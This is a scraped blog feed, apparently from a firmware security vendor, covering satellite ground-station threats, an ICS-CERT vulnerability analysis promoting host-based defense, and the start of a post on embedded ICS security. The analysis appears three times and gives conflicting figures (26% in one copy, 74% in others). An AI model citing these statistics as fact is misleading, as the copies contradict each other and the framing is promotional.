Much attention has been paid to the threat of signal jamming or spoofing directed at satellite vehicles, which could lead to collisions or disruption of internet access in vital industry or governmental communications. But dangerous cyberattacks can focus on any part of a satellite network, including multiple devices that support satellite base stations and communications hubs. These assets on the ground can be accessed remotely, or in many cases physically, since they often are in isolated locations with variable perimeter security.

 

The objective of such attacks could also be the compromise or destruction of land-based equipment, as seems to be the case with the Viasat/KA-SAT attack, which temporarily disabled thousands of modems in several countries. Viasat’s analysis indicates the attacker began by exploiting a VPN device misconfiguration, gained remote access to a segment of the company network, and then sent management commands to thousands of modems at once, which overwrote flash memory and temporarily knocked the modems offline. It was a consequential strike that required no knowledge or exploits of a satellite vehicle.

 

2. End users, manufacturers and security experts must collaborate on advanced solutions

The impressive growth of commercial aerospace and satellite deployments complicates efforts to elevate industry security standards. As more business opportunities are built out and scaled, we can expect more players to enter the space, and more reliance on increasingly complex supply chains — both of which will elevate cyber risk. The days in which a few established private sector enterprises supplied technology and devices to a few dedicated clients, each of which was a branch of the government, are past.

 

Given this new reality, collaboration around industry standards will be essential to satellite network security. As more companies move in, it’s critical that established players advocate and fight for high-security standards that reflect the current threat climate. This can help establish benchmarks that elevate current standards, promote accountability, and incorporate security solutions for devices and systems.

 

The U.S. government will remain hugely influential, due to the power of its purse, decades of aerospace engagement, and history of collaboration with industry leaders. It can actually incentivize commercial suppliers to invest in advanced security controls by demanding them — and it most certainly should do so.

 

There is also a need for rigorous testing of new security deployments in controlled environments, such as red vs. blue exercises. These can provide training for military operators and opportunities for them to work with device manufacturers to integrate security technology with new and legacy satellite communications equipment. Ideally, this training should include commercial equipment manufacturers, equipment operators, and security experts. Securing space will require a highly collaborative, multi-disciplinary approach: No one body of experts has all the answers.

 

3. We must expand regulations to cover embedded systems

Government regulators have had timely responses to emerging satellite communications network threats. In the first months of 2022, CISA issued two alerts (one in collaboration with the FBI) for service providers and customers, while NIST pushed to update its guidelines for satcom cybersecurity risk management.

 

Although welcome, these documents focus on network-based security controls that are essential, but not sufficient to meet current threats. Like other recent directives, they do not adequately address security challenges in embedded systems and the devices that support them. What guidance there is focuses on network controls: also essential, also unable to provide a comprehensive security posture.

 

For decades, security policy has exempted special purpose and embedded systems as being too difficult to secure while maintaining real-time performance. It is time for policy to catch up with technology and mandate the levels of security controls that are now feasible for aerospace, and many other industries.

Red Balloon Security Investigations

As a leading cybersecurity research and technology firm, Red Balloon Security has undertaken multiple investigations of satellite system devices, communications protocols, and their security postures. The company has disclosed multiple vulnerabilities to device manufacturers, and has worked closely with teams in the U.S. Department of Homeland Security, Air Force and Department of Defense to develop security hardening solutions across satellite systems.

 

CyberLEO 2022

Red Balloon Security’s CEO and founder, Dr. Ang Cui, joined the advisory board of CybeLEO in 2022 to promote security solutions across commercial and US government satellite systems. CyberLEO 2022 focused on the urgent need to protect expanding satellite constellations from existing and evolving cybersecurity threats.

 

During the conference, Red Balloon Security presented several demonstrations, one of which included the injection of a firmware implant directly into the firmware binary of a commercial satellite modem. The firmware implant was designed to be stealthy and kick in during the modem’s boot process. It created a communication channel and acted as a pivot point from the ground station to the space assets. In particular, the implant enabled communication with a reaction wheel inside a mock CubeSat, and enabled telnet control for Command and Control (C2) operations, which included sending malicious commands that arbitrarily control the CubeSat’s navigation.

 

These explorations uncovered the importance of holistic platform security for all devices involved in a satellite system, on the ground and in space. Such firmware implants, if they go undetected, have severe consequences for ground control and space equipment: Compromised firmware can result in loss of functionality of the equipment, destruction of the equipment, and even loss of life in the event of orchestrated space collisions against manned missions.

]]>
https://redballoonsecurity.com/embedded-systems-and-aerospace-satellite-cybersecurity/feed/ 0 6981
ICS-CERT vulnerability analysis https://redballoonsecurity.com/ics-cert-vulnerability-analysis/ https://redballoonsecurity.com/ics-cert-vulnerability-analysis/#respond Tue, 26 Apr 2022 19:50:34 +0000 https://redballoonsecurity.com/?p=6734

ICS-CERT vulnerability analysis

ICS-CERT vulnerability analysis

ICS-CERT vulnerability analysis

What's in a vulnerability: Evaluating host-based defense through recent ICS device data

We analyzed data from the national vulnerability database to assess the applicability of on-device security features

Whether they are discovered by independent researchers, manufacturers, or cyber attackers, device vulnerabilities traditionally have been remedied via patching. Although reactive, patching’s effectiveness is easy enough to quantify: It is effective if the vulnerability no longer exists after the patch is applied.

 

A host-based defense is another matter. It comprises technology that monitors a device’s function and issues alerts or remediations whenever malicious activity is detected. It does not remediate vulnerabilities: Rather, it defends against exploitation of an undiscovered or unremediated vulnerability. 

 

As such, the host-based security apparatus’s effectiveness can be harder to evaluate than patching. There are several methods, including listing the controls enforced, mapping to a threat model, red teaming, or measuring the effectiveness of host-based defenses against current or likely, in the field, near-term attacks (“proven in use”). 

 

And while “proven in use” evidence has obvious value, it is difficult to gather on host-based defenses (such as RBS’s Symbiote technology). The publicly available data on actual attacks is small, and there is good reason to believe it is often obscured or not released publicly.

 

Vulnerability disclosures provide some insights, as we can at least determine what types of attacks might be mounted against each vulnerability class. But no matter how severe it is, a device vulnerability only indicates a plausible means for a cyber attacker to gain a foothold on a device. Furthermore, the ongoing reality of zero-day vulnerabilities, which are not detected until a cyber incident is underway, requires a different way of thinking about, and defending against, attacks.

 

One way is to extrapolate from vulnerability data. This approach depends on several assumptions:

  1. A regularly replenished, published list of vulnerabilities discovered on embedded devices.
  2. An unknown set of zero-day vulnerabilities that are not reflected in the published data.
  3. A population of attackers with sufficient sophistication to base attacks either on known or zero-day vulnerabilities.

Host-based security is predicated on the need to move beyond a continuous cycle of patching. Vulnerabilities will always exist, and while the reactive patching process will continue to play a role in device security, it simply is not capable of deflecting a subset of threats that are not discovered or can’t be patched. 

 

To evaluate host-based defense, we’ve used raw data published by the U.S. Cybersecurity & Infrastructure Security Agency-CISA on its ICS-Cert Advisories page. The entries include a rating based on the Common Vulnerability Scoring System (CVSS); risk evaluation; affected products, a Common Weakness Enumeration (CWE); and a vulnerability overview/analysis. The analysis is the key component that allows us to determine whether or not an attack launched against this vulnerability would be detected if a host-based defense technology was in place on the device. 

Why host-based defense analysis is relevant

Host-based security can benefit end users and original equipment manufacturers in terms of total cost of ownership and reputation:

  • While expeditious patching of vulnerabilities is always recommended, host-based defense can provide protection even when patching is delayed, in addition to protecting against exploitable, but unknown, firmware vulnerabilities.

 

  • As an active method, host-based security can prevent end users from being compromised by zero-day exploits or within a window between the vulnerability discovery and patch application. It can also help OEMs reduce cost by combining patches and aligning updates.

 

  • Detection can benefit OEMs and end users by generating forensic data, which can help identify capability gaps in current technology, facilitate upgrades, and form methods of preventing future attacks.

Quantitative findings:

Assessments of a host-based defense’s ability to detect and/or prevent attacks exploiting any particular vulnerability rely on the ICS Advisory’s risk evaluation, which highlights the class of weakness (CWE) to which the vulnerability belongs, and the consequences of the vulnerability’s exploit (e.g., remote code execution, buffer overflow, denial of service). 

 

We reviewed approximately six months of ICS-Cert vulnerability disclosures. Of these, 37% were found in firmware.

ICSCERT_1

Of the vulnerabilities with CVSS categorizations of “high” or “critical,” almost 57% (157 of 276) are firmware-based:[1]

In our analysis, a host-based defense would be effective protection against 63% of these vulnerabilities, including all CVSS severity levels:

However, of the “high” or “critical” CVSS firmware vulnerabilities, a host-based defense could  remove an attacker’s opportunity to reliably execute code or modify memory as part of an attack.  It would be applicable or likely applicable on 26% of these vulnerabilities, and would reduce the CVSS rating for roughly one out of three, with an average decrease of 2.3 points on the CVSS scale.

 

More importantly, applying a host-based defense can reduce the severity of compromises to device integrity, confidentiality and availability. With CVSS vectors, a successful exploit would give an attacker the ability to gain full visibility into the devices’ functionality, and the ability to manipulate files and to deny access by legitimate users.

Our analysis found strong or universal host-based defense applicability with improper input validation, improper command injection, and classic buffer overflow:

This is a breakdown that demonstrates host-based defense applicability to specific vulnerability types relevant to embedded systems.

Notes about the analysis and CISA advisories

The information included in device vulnerability advisories is not consistent. In some, there is an abundance of information and definite statements about the type of exploit an attacker could undertake. When, for example, a vulnerability is described as “buffer overflow that leads to remote code execution,” it is clear that host-based defense would be effective. 

 

In contrast, with a vulnerability that allows “privilege escalation through a website and execution of OS-level commands,” host-based defense will be effective in some, but not all cases. If the commands being executed are meant to run on the device, host-based detection and response will not be remediative. It will be, however, if the commands should not be allowed when the device is deployed, but were incidentally included in the OS or firmware. 

 

This accounts for the subset of results identified by the “host defense maybe” portion of the graphs above. Even in a highly selective analysis that does not consider these results, there is a strong case for the utility of host-based defenses for embedded devices and systems.

Where we expect to see significant change in our findings:

The percentage of disclosed vulnerabilities for which host-based defense will be applicable is almost certain to rise in the future, as vulnerabilities related to relatively simple engineering fixes (e.g. presence of hard-coded passwords) are resolved. More severe vulnerabilities associated with complex device controls and firmware can lead to remote code execution and other exploits, particularly given that attackers are increasingly targeting this level.

Additional context:

Data from Claroty’s H1 2022 ICS Risk & Vulnerability Report provides useful analysis that frames the value of host-based firmware defense. Here are some key findings:

  • 31% of the report’s disclosed vulnerabilities have no fix, or only a partial remediation. Of these, almost half were firmware-based vulnerabilities.

 

  • 25% of the vulnerabilities affected either the supervisory control or basic control ICS level. An attacker who is able to exploit vulnerabilities at this level will be in a strong position to access lower levels of the process, including mission-critical and safety devices. 

 

  • Of the basic control vulnerabilities, Claroty judged that 53% could lead to code execution, and 91% of those vulnerabilities could be exploited remotely. 

 

  • 29 affected products were “end-of-life” that the manufacturer no longer supports — and 22 of these had firmware vulnerabilities. “End of life”  status does not guarantee the end user will soon replace the device; some may choose to maintain it because it is still functional, is expensive to replace or too difficult to take offline. For these, Claroty concludes that “the only solution is to mitigate (where possible) until replacement,” while also noting firmware updates can take months or even years to release. These cases present another strong argument for host-base defense that does not depend on patching and updates. 

 

  • The firmware vulnerabilities in this report are concentrated in OT systems and networks:

Source: Claroty ICS Risk & Vulnerability Report, H2 2021

Vulnerabilities will persist: Host-based defense is an essential component of the solution

Our analysis highlights two important realities: Vulnerabilities in OT systems are common, and at risk due to the reactive approach to patching.

 

Of course, not every vulnerability represents a serious or immediate attack opportunity. Attackers must work to formulate an exploit based on a published vulnerability, and also figure out how to reach the device in the field to run the exploit. Exploiting an unpublished or undiscovered vulnerability is even more challenging, as the attacker will need to undertake their own research and discovery process.

 

Also, we are not suggesting that the current cycle of discovery, disclosure and remediation is inherently flawed or in need of replacement. Given the quantity of published vulnerabilities and the uncountable number still undiscovered, DevOps and patching will be part of the security landscape for the foreseeable future. 

 

But it is important to recognize that DevOps and patching can be a slow process, especially with firmware. It is not uncommon for the creation, testing and release of a firmware patch to require several months. Updates in safety certifications take even longer. Relying solely on these remediation mechanisms will not suffice; while still valuable, they must be augmented by technology that can respond in real time to zero-day attacks on undiscovered or unpatched vulnerabilities.

 

The findings in this analysis demonstrate the value of implementing security controls that detect anomalous behavior at the firmware level as a necessary extension of the reactive, “whack-a-mole” patching defense. These host-based defenses can provide a critical next step in device protection, and help to include embedded devices in a true “defense in depth” system. 

 

We encourage you to review the accompanying data, and to learn more about how our firmware hardening, protection, and monitoring solutions can help your products and industrial systems achieve modern, proactive security.

What's in a vulnerability: Evaluating host-based defense through recent ICS device data

We analyzed data from the national vulnerability database to assess the applicability of on-device security features

Whether they are discovered by independent researchers, manufacturers, or cyber attackers, device vulnerabilities traditionally have been remedied via patching. Although reactive, patching’s effectiveness is easy enough to quantify: It is effective if the vulnerability no longer exists after the patch is applied.

 

A host-based defense is another matter. It comprises technology that monitors a device’s function and issues alerts or remediations whenever malicious activity is detected. It does not remediate vulnerabilities: Rather, it defends against exploitation of an undiscovered or unremediated vulnerability. 

 

As such, the host-based security apparatus’s effectiveness can be harder to evaluate than patching. There are several methods, including listing the controls enforced, mapping to a threat model, red teaming, or measuring the effectiveness of host-based defenses against current or likely, in the field, near-term attacks (“proven in use”). 

 

And while “proven in use” evidence has obvious value, it is difficult to gather on host-based defenses (such as RBS’s Symbiote technology). The publicly available data on actual attacks is small, and there is good reason to believe it is often obscured or not released publicly.

 

Vulnerability disclosures provide some insights, as we can at least determine what types of attacks might be mounted against each vulnerability class. But no matter how severe it is, a device vulnerability only indicates a plausible means for a cyber attacker to gain a foothold on a device. Furthermore, the ongoing reality of zero-day vulnerabilities, which are not detected until a cyber incident is underway, requires a different way of thinking about, and defending against, attacks.

 

One way is to extrapolate from vulnerability data. This approach depends on several assumptions:

  1. A regularly replenished, published list of vulnerabilities discovered on embedded devices.
  2. An unknown set of zero-day vulnerabilities that are not reflected in the published data.
  3. A population of attackers with sufficient sophistication to base attacks either on known or zero-day vulnerabilities.

Host-based security is predicated on the need to move beyond a continuous cycle of patching. Vulnerabilities will always exist, and while the reactive patching process will continue to play a role in device security, it simply is not capable of deflecting a subset of threats that are not discovered or can’t be patched. 

 

To evaluate host-based defense, we’ve used raw data published by the U.S. Cybersecurity & Infrastructure Security Agency-CISA on its ICS-Cert Advisories page. The entries include a rating based on the Common Vulnerability Scoring System (CVSS); risk evaluation; affected products, a Common Weakness Enumeration (CWE); and a vulnerability overview/analysis. The analysis is the key component that allows us to determine whether or not an attack launched against this vulnerability would be detected if a host-based defense technology was in place on the device. 

Why host-based defense analysis is relevant

Host-based security can benefit end users and original equipment manufacturers in terms of total cost of ownership and reputation:

  • While expeditious patching of vulnerabilities is always recommended, host-based defense can provide protection even when patching is delayed, in addition to protecting against exploitable, but unknown, firmware vulnerabilities.

 

  • As an active method, host-based security can prevent end users from being compromised by zero-day exploits or within a window between the vulnerability discovery and patch application. It can also help OEMs reduce cost by combining patches and aligning updates.

 

  • Detection can benefit OEMs and end users by generating forensic data, which can help identify capability gaps in current technology, facilitate upgrades, and form methods of preventing future attacks.

Quantitative findings:

Assessments of a host-based defense’s ability to detect and/or prevent attacks exploiting any particular vulnerability rely on the ICS Advisory’s risk evaluation, which highlights the class of weakness (CWE) to which the vulnerability belongs, and the consequences of the vulnerability’s exploit (e.g., remote code execution, buffer overflow, denial of service). 

 

We reviewed approximately six months of ICS-Cert vulnerability disclosures. Of these, 37% were found in firmware.

ICSCERT_1

Of the vulnerabilities with CVSS categorizations of “high” or “critical, almost 57% (157 of 276) are firmware-based:[1]

In our analysis, a host-based defense would be effective protection against 63% of these vulnerabilities, including all CVSS severity levels:

However, of the “high” or “critical” CVSS firmware vulnerabilities, a host-based defense could  remove an attacker’s opportunity to reliably execute code or modify memory as part of an attack.  It would be applicable or likely applicable on 74% of these vulnerabilities, and would reduce the CVSS rating for roughly one out of three, with an average decrease of 2.3 points on the CVSS scale.

 

More importantly, applying a host-based defense can reduce the severity of compromises to device integrity, confidentiality and availability. With CVSS vectors, a successful exploit would give an attacker the ability to gain full visibility into the devices’ functionality, and the ability to manipulate files and to deny access by legitimate users.

Our analysis found strong or universal host-based defense applicability with improper input validation, improper command injection, and classic buffer overflow:

This is a breakdown that demonstrates host-based defense applicability to specific vulnerability types relevant to embedded systems.

Notes about the analysis and CISA advisories

The information included in device vulnerability advisories is not consistent. In some, there is an abundance of information and definite statements about the type of exploit an attacker could undertake. When, for example, a vulnerability is described as “buffer overflow that leads to remote code execution,” it is clear that host-based defense would be effective. 

 

In contrast, with a vulnerability that allows “privilege escalation through a website and execution of OS-level commands,” host-based defense will be effective in some, but not all cases. If the commands being executed are meant to run on the device, host-based detection and response will not be remediative. It will be, however, if the commands should not be allowed when the device is deployed, but were incidentally included in the OS or firmware. 

 

This accounts for the subset of results identified by the “host defense maybe” portion of the graphs above. Even in a highly selective analysis that does not consider these results, there is a strong case for the utility of host-based defenses for embedded devices and systems.

Where we expect to see significant change in our findings:

The percentage of disclosed vulnerabilities for which host-based defense will be applicable is almost certain to rise in the future as vulnerabilities related to relatively simple engineering fixes (e.g. presence of hard-coded passwords) are resolved. More severe vulnerabilities associated with complex device controls and firmware can lead to remote code execution and other exploits, particularly given that attackers are increasingly targeting this level.

Additional context:

Data from Claroty’s H1 2022 ICS Risk & Vulnerability Report provides useful analysis that frames the value of host-based firmware defense. Here are some key findings:

  • 31% of the report’s disclosed vulnerabilities have no fix, or only a partial remediation. Of these, almost half were firmware-based vulnerabilities.

 

  • 25% of the vulnerabilities affected either the supervisory control or basic control ICS level. An attacker who is able to exploit vulnerabilities at this level will be in a strong position to access lower levels of the process, including mission-critical and safety devices. 

 

  • Of the basic control vulnerabilities, Claroty judged that 53% could lead to code execution, and 91% of those vulnerabilities could be exploited remotely. 

 

  • 29 affected products were “end-of-life” that the manufacturer no longer supports — and 22 of these had firmware vulnerabilities. “End of life”  status does not guarantee the end user will soon replace the device; some may choose to maintain it because it is still functional, is expensive to replace or too difficult to take offline. For these, Claroty concludes that “the only solution is to mitigate (where possible) until replacement,” while also noting firmware updates can take months or even years to release. These cases present another strong argument for host-base defense that does not depend on patching and updates. 

 

  • The firmware vulnerabilities in this report are concentrated in OT systems and networks:

Source: Claroty ICS Risk & Vulnerability Report, H2 2021

Vulnerabilities will persist: Host-based defense is an essential component of the solution

Our analysis highlights two important realities: Vulnerabilities in OT systems are common, and at risk due to the reactive approach to patching.

 

Of course, not every vulnerability represents a serious or immediate attack opportunity. Attackers must work to formulate an exploit based on a published vulnerability, and also figure out how to reach the device in the field to run the exploit. Exploiting an unpublished or undiscovered vulnerability is even more challenging, as the attacker will need to undertake their own research and discovery process.

Also, we are not suggesting that the current cycle of discovery, disclosure and remediation is inherently flawed or in need of replacement. Given the quantity of published vulnerabilities and the uncountable number still undiscovered, DevOps and patching will be part of the security landscape for the foreseeable future. 

 

But it is important to recognize that DevOps and patching can be a slow process, especially with firmware. It is not uncommon for the creation, testing and release of a firmware patch to require several months. Updates in safety certifications take even longer. Relying solely on these remediation mechanisms will not suffice; while still valuable, they must be augmented by technology that can respond in real time to zero day attacks on undiscovered or unpatched vulnerabilities.

 

The findings in this analysis demonstrate the value of implementing security controls that detect anomalous behavior at the firmware level as a necessary extension of the reactive, “whack-a-mole” patching defense. These host-based defenses can provide a critical next step in device protection, and help to include embedded devices in a true “defense in depth” system. 

 

We encourage you to review the accompanying data, and to learn more about how our firmware hardening, protection, and monitoring solutions can help your products and industrial systems achieve modern, proactive security.

What's in a vulnerability: Evaluating host-based defense through recent ICS device data

We analyzed data from the national vulnerability database to assess the applicability of on-device security features

Whether they are discovered by independent researchers, manufacturers, or cyber attackers, device vulnerabilities traditionally have been remedied via patching. Although reactive, patching’s effectiveness is easy enough to quantify: It is effective if the vulnerability no longer exists after the patch is applied.

 

A host-based defense is another matter. It comprises technology that monitors a device’s function and issues alerts or remediations whenever malicious activity is detected. It does not remediate vulnerabilities: Rather, it defends against exploitation of an undiscovered or unremediated vulnerability. 

 

As such, the host-based security apparatus’s effectiveness can be harder to evaluate than patching. There are several methods, including listing the controls enforced, mapping to a threat model, red teaming, or measuring the effectiveness of host-based defenses against current or likely, in the field, near-term attacks (“proven in use”). 

 

And while “proven in use” evidence has obvious value, it is difficult to gather on host-based defenses (such as RBS’s Symbiote technology). The publicly available data on actual attacks is small, and there is good reason to believe it is often obscured or not released publicly.

 

Vulnerability disclosures provide some insights, as we can at least determine what types of attacks might be mounted against each vulnerability class. But no matter how severe it is, a device vulnerability only indicates a plausible means for a cyber attacker to gain a foothold on a device. Furthermore, the ongoing reality of zero-day vulnerabilities, which are not detected until a cyber incident is underway, requires a different way of thinking about, and defending against, attacks.

 

One way is to extrapolate from vulnerability data. This approach depends on several assumptions:

  1. A regularly replenished, published list of vulnerabilities discovered on embedded devices.
  2. An unknown set of zero-day vulnerabilities that are not reflected in the published data.
  3. A population of attackers with sufficient sophistication to base attacks either on known or zero-day vulnerabilities.

Host-based security is predicated on the need to move beyond a continuous cycle of patching. Vulnerabilities will always exist, and while the reactive patching process will continue to play a role in device security, it simply is not capable of deflecting a subset of threats that are not discovered or can’t be patched. 

 

To evaluate host-based defense, we’ve used raw data published by the U.S. Cybersecurity & Infrastructure Security Agency-CISA on its ICS-Cert Advisories page. The entries include a rating based on the Common Vulnerability Scoring System (CVSS); risk evaluation; affected products, a Common Weakness Enumeration (CWE); and a vulnerability overview/analysis. The analysis is the key component that allows us to determine whether or not an attack launched against this vulnerability would be detected if a host-based defense technology was in place on the device. 

Why host-based defense analysis is relevant

Host-based security can benefit end users and original equipment manufacturers in terms of total cost of ownership and reputation:

  • While expeditious patching of vulnerabilities is always recommended, host-based defense can provide protection even when patching is delayed, in addition to protecting against exploitable, but unknown, firmware vulnerabilities.
  • As an active method, host-based security can prevent end users from being compromised by zero-day exploits or within a window between the vulnerability discovery and patch application. It can also help OEMs reduce cost by combining patches and aligning updates.
  • Detection can benefit OEMs and end users by generating forensic data, which can help identify capability gaps in current technology, facilitate upgrades, and form methods of preventing future attacks.

Quantitative findings:

Assessments of a host-based defense’s ability to detect and/or prevent attacks exploiting any particular vulnerability rely on the ICS Advisory’s risk evaluation, which highlights the class of weakness (CWE) to which the vulnerability belongs, and the consequences of the vulnerability’s exploit (e.g., remote code execution, buffer overflow, denial of service). 

 

We reviewed approximately six months of ICS-Cert vulnerability disclosures. Of these, 37% were found in firmware.

ICSCERT_1

Of the vulnerabilities with CVSS categorizations of “high” or “critical, almost 57% (157 of 276) are firmware-based:[1]

In our analysis, a host-based defense would be effective protection against 63% of these vulnerabilities, including all CVSS severity levels:

However, of the “high” or “critical” CVSS firmware vulnerabilities, a host-based defense could  remove an attacker’s opportunity to reliably execute code or modify memory as part of an attack.  It would be applicable or likely applicable on 74% of these vulnerabilities, and would reduce the CVSS rating for roughly one out of three, with an average decrease of 2.3 points on the CVSS scale.

 

More importantly, applying a host-based defense can reduce the severity of compromises to device integrity, confidentiality and availability. With CVSS vectors, a successful exploit would give an attacker the ability to gain full visibility into the devices’ functionality, and the ability to manipulate files and to deny access by legitimate users.

Our analysis found strong or universal host-based defense applicability with improper input validation, improper command injection, and classic buffer overflow:

This is a breakdown that demonstrates host-based defense applicability to specific vulnerability types relevant to embedded systems.

Notes about the analysis and CISA advisories

The information included in device vulnerability advisories is not consistent. In some, there is an abundance of information and definite statements about the type of exploit an attacker could undertake. When, for example, a vulnerability is described as “buffer overflow that leads to remote code execution,” it is clear that host-based defense would be effective. 

 

In contrast, with a vulnerability that allows “privilege escalation through a website and execution of OS-level commands,” host-based defense will be effective in some, but not all cases. If the commands being executed are meant to run on the device, host-based detection and response will not be remediative. It will be, however, if the commands should not be allowed when the device is deployed, but were incidentally included in the OS or firmware. 

 

This accounts for the subset of results identified by the “host defense maybe” portion of the graphs above. Even in a highly selective analysis that does not consider these results, there is a strong case for the utility of host-based defenses for embedded devices and systems.

Where we expect to see significant change in our findings:

The percentage of disclosed vulnerabilities for which host-based defense will be applicable is almost certain to rise in the future as vulnerabilities related to relatively simple engineering fixes (e.g. presence of hard-coded passwords) are resolved. More severe vulnerabilities associated with complex device controls and firmware can lead to remote code execution and other exploits, particularly given that attackers are increasingly targeting this level.

Additional context:

Data from Claroty’s H1 2022 ICS Risk & Vulnerability Report provides useful analysis that frames the value of host-based firmware defense. Here are some key findings:

  • 31% of the report’s disclosed vulnerabilities have no fix, or only a partial remediation. Of these, almost half were firmware-based vulnerabilities.

 

  • 25% of the vulnerabilities affected either the supervisory control or basic control ICS level. An attacker who is able to exploit vulnerabilities at this level will be in a strong position to access lower levels of the process, including mission-critical and safety devices. 

 

  • Of the basic control vulnerabilities, Claroty judged that 53% could lead to code execution, and 91% of those vulnerabilities could be exploited remotely. 

 

  • 29 affected products were “end-of-life” that the manufacturer no longer supports — and 22 of these had firmware vulnerabilities. “End of life”  status does not guarantee the end user will soon replace the device; some may choose to maintain it because it is still functional, is expensive to replace or too difficult to take offline. For these, Claroty concludes that “the only solution is to mitigate (where possible) until replacement,” while also noting firmware updates can take months or even years to release. These cases present another strong argument for host-base defense that does not depend on patching and updates. 

 

  • The firmware vulnerabilities in this report are concentrated in OT systems and networks:

Source: Claroty ICS Risk & Vulnerability Report, H2 2021

Vulnerabilities will persist: Host-based defense is an essential component of the solution

Our analysis highlights two important realities: Vulnerabilities in OT systems are common, and at risk due to the reactive approach to patching.

 

Of course, not every vulnerability represents a serious or immediate attack opportunity. Attackers must work to formulate an exploit based on a published vulnerability, and also figure out how to reach the device in the field to run the exploit. Exploiting an unpublished or undiscovered vulnerability is even more challenging, as the attacker will need to undertake their own research and discovery process.

 

Also, we are not suggesting that the current cycle of discovery, disclosure and remediation is inherently flawed or in need of replacement. Given the quantity of published vulnerabilities and the uncountable number still undiscovered, DevOps and patching will be part of the security landscape for the foreseeable future. 

 

But it is important to recognize that DevOps and patching can be a slow process, especially with firmware. It is not uncommon for the creation, testing and release of a firmware patch to require several months. Updates in safety certifications take even longer. Relying solely on these remediation mechanisms will not suffice; while still valuable, they must be augmented by technology that can respond in real time to zero day attacks on undiscovered or unpatched vulnerabilities.

 

The findings in this analysis demonstrate the value of implementing security controls that detect anomalous behavior at the firmware level as a necessary extension of the reactive, “whack-a-mole” patching defense. These host-based defenses can provide a critical next step in device protection, and help to include embedded devices in a true “defense in depth” system. 

 

We encourage you to review the accompanying data, and to learn more about how our firmware hardening, protection, and monitoring solutions can help your products and industrial systems achieve modern, proactive security.

[1] CVSS scores depend on a rubric that considers multiple variables, including the distance an attacker can be from a target; whether or not the attacker can perform the attack at will; whether or not any user interaction is required; the number of privileges that are required; whether or not systems beyond the vulnerable component can be impacted; the amount of information that may be disclosed; the amount of information that can be modified; and the degree of disruption to availability. For a detailed description of the scoring, see https://www.first.org/cvss/user-guide.

[1] CVSS scores depend on a rubric that considers multiple variables, including the distance an attacker can be from a target; whether or not the attacker can perform the attack at will; whether or not any user interaction is required; the number of privileges that are required; whether or not systems beyond the vulnerable component can be impacted; the amount of information that may be disclosed; the amount of information that can be modified; and the degree of disruption to availability. For a detailed description of the scoring, see https://www.first.org/cvss/user-guide.

[1] CVSS scores depend on a rubric that considers multiple variables, including the distance an attacker can be from a target; whether or not the attacker can perform the attack at will; whether or not any user interaction is required; the number of privileges that are required; whether or not systems beyond the vulnerable component can be impacted; the amount of information that may be disclosed; the amount of information that can be modified; and the degree of disruption to availability. For a detailed description of the scoring, see https://www.first.org/cvss/user-guide.

]]>
https://redballoonsecurity.com/ics-cert-vulnerability-analysis/feed/ 0 6734
Why embedded device security is essential to ICS systems https://redballoonsecurity.com/why-embedded-device-security-is-essential-to-ics-systems/ https://redballoonsecurity.com/why-embedded-device-security-is-essential-to-ics-systems/#respond Mon, 04 Apr 2022 15:45:42 +0000 https://redballoonsecurity.com/?p=5385

Why embedded device security is essential to ICS systems

Why embedded device security is essential to ICS systems

Why embedded device security is essential to ICS systems

Protections at the device level are not a replacement for security controls in OT systems and networks. They’re a necessary extension of them.

Embedded devices in industrial control systems (ICS) operate within an increasingly complex array of systems, networks and protocols. The complexity is only increasing as end users require more insight into how ICS operate, and push for more connectivity between controls and individual devices that underpin the systems’ performances. This has had the effect of complicating ICS’ hierarchical communication structure and introducing new cyber threats with the potential to target devices that operate below the control level.

 

As with IT systems that increased connectivity and exposed endpoints (such as PC’s and network infrastructure), ICS have expanded into multiple layers, each of which has security controls designed to protect against cyberattacks that are increasingly common and capable of targeting devices on the operational technology (OT) side.

 

We first witnessed the security evolution in informational technology (IT) systems on the enterprise level. Over the course of two decades, IT systems expanded and incorporated a vast number of new endpoints, and a correspondingly complex new system of connection points, networks, and communication protocols. The proliferation of endpoints and connections led to increased cyber threats and successful intrusions, which ultimately provided incentive to harden and expand security controls throughout the IT environment.  

 

A similar evolution occurred in control rooms in the last 10 years. Devices became more common, more connected, and subsequently more vulnerable. Each year there are more documented attacks targeting endpoints such as SCADA servers and historians, engineering work stations, HMIs, and communications infrastructure. By now, it is accepted that security controls at this ICS level should be as robust as those applied to IT systems.

 

We are now at the point where the next expansion of security must cover the endpoints closest to the ICS physical processes. This includes devices such as actuators, sensors, valves, robotics, and safety equipment, as well as human machine interfaces (HMI), programmable logic controllers (PLCs), fieldbus I/O, and other controllers that operate outside the control room. Here too, some assumptions about the insularity of these endpoints have persisted: They are too hard to reach and exploit; they are not sufficiently valuable as attack targets; controls at higher levels of the ICS technology attack offer sufficient protection.

 

To explain why these assumptions are no longer valid, it is helpful to view the modern ICS system in the context of current ICS cyber threats. It’s also imperative to recognize that cyberattacks can work through even the most robust sequence of security layers or bypass them through exploitation of permissions. Equally important is the recognition that embedded devices at the lowest ICS levels can be accessed via the control room, and that persistent compromise of such devices is not only possible, but not particularly difficult to execute.

Perdue_Model_ICS@2x

Attacks that reach the bottom of the ICS stack are rare, but typically much more damaging that attacks at the higher levels.

Security at all ICS layers will remain essential, and controls at the IT, DMZ and control room levels will continue to deflect the large majority of ICS attack attempts. But the next essential step — which remains far from complete — is to create an truly in-depth ICS security structure by pushing controls onto devices themselves. To understand why, it can be helpful to review of what security at other layers accomplishes — and what it can miss.

ICS security is an evolutionary process

It’s hardly surprising that the concept of on-device security is still gaining purchase, since only a few years ago most of the ICS layers below the enterprise level were thought to be air-gapped, or so hard to access as to endpoint security controls unnecessary, or not worth the disruption they would cause once they were implemented.  

 

The air-gap premise was plausible only as long as the control-room level generally was not connected to the enterprise network, public Internet and wireless networks. However, attacks such as Stuxnet demonstrated that air-gapping was not an impenetrable defense, and the lack of connectivity became an impediment once control room-level endpoints and their collected data became valuable to working groups on the enterprise level.

 

At this point, there were strong arguments for creating or strengthening firewalls, the DMZ, and robust communications protocols. But there was still resistance to putting security directly onto endpoints at the control room level.

 

Five years ago, control room endpoints typically did not run with antivirus, whitelisting or other digital security tools, and they could not receive patches or updates, for fear this would disrupt the plant or system operations. These concerns were not entirely unfounded, as it did requite engineering adjustments to make controls such as antivirus work effectively within SCADA systems and other control assets.

 

But as systems improved, software update signing became the standard, and security controls were calibrated to function without drawing down too much processing power. There also has been a corresponding rise in the number of cyberattacks on the control room level to solidify the case for endpoint protection. Today, in most ICS deployments, control room devices are outfitted with a level of security that equals that of endpoints on the enterprise level.

ICS security, layer on layer

